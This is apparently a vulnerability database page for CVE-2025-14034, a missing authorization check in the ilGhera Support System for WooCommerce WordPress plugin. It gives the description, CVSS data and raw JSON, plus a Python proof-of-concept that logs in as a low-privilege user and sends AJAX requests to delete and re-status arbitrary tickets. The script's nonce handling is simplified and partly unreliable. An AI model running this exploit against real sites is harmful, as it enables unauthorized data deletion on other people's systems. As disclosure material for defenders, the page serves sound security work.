Security Vulnerability Report
中文
CVE-2025-14034 CVSS 5.3 MEDIUM

CVE-2025-14034

Published: 2026-01-06 04:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ilGhera Support System for WooCommerce <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14034 PoC - ilGhera Support System for WooCommerce Unauthorized Access import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" TICKET_ID = 1 # Target ticket ID to delete/modify def get_nonce(login_url, ajax_url): """Simulate getting authentication tokens""" session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': 1 } response = session.post(login_url, data=login_data) # Extract nonce for AJAX requests (simplified) nonce = session.cookies.get_dict().get('wordpress_test_cookie', '') return session, nonce def delete_ticket(session, ticket_id): """Delete a ticket without proper authorization""" delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { 'action': 'delete_single_ticket', 'ticket_id': ticket_id, 'nonce': '' # No proper nonce validation } response = session.post(delete_url, data=payload) return response def change_ticket_status(session, ticket_id, new_status='closed'): """Change ticket status without proper authorization""" change_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { 'action': 'change_ticket_status', 'ticket_id': ticket_id, 'status': new_status, 'nonce': '' # No proper nonce validation } response = session.post(change_url, data=payload) return response def main(): login_url = f"{TARGET_URL}/wp-login.php" session, nonce = get_nonce(login_url, TARGET_URL) # Exploit: Delete arbitrary ticket print(f"[*] Deleting ticket ID: {TICKET_ID}") response = delete_ticket(session, TICKET_ID) print(f"[*] Response: {response.status_code}") # Exploit: Change ticket status print(f"[*] Changing ticket status to 'closed'") response = change_ticket_status(session, TICKET_ID, 'closed') print(f"[*] Response: {response.status_code}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14034", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:53.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status."}, {"lang": "es", "value": "El plugin ilGhera Support System para WooCommerce para WordPress es vulnerable a la modificación no autorizada y la pérdida de datos debido a una verificación de capacidad faltante en las funciones 'delete_single_ticket_callback' y 'change_ticket_status_callback' en todas las versiones hasta la 1.2.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, eliminen tickets de soporte arbitrarios y modifiquen su estado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L1331", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L865", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L1331", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L865", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426161%40wc-support-system&new=3426161%40wc-support-system&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e74fb552-3ef4-47cd-8fe6-8cc1e74b8377?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.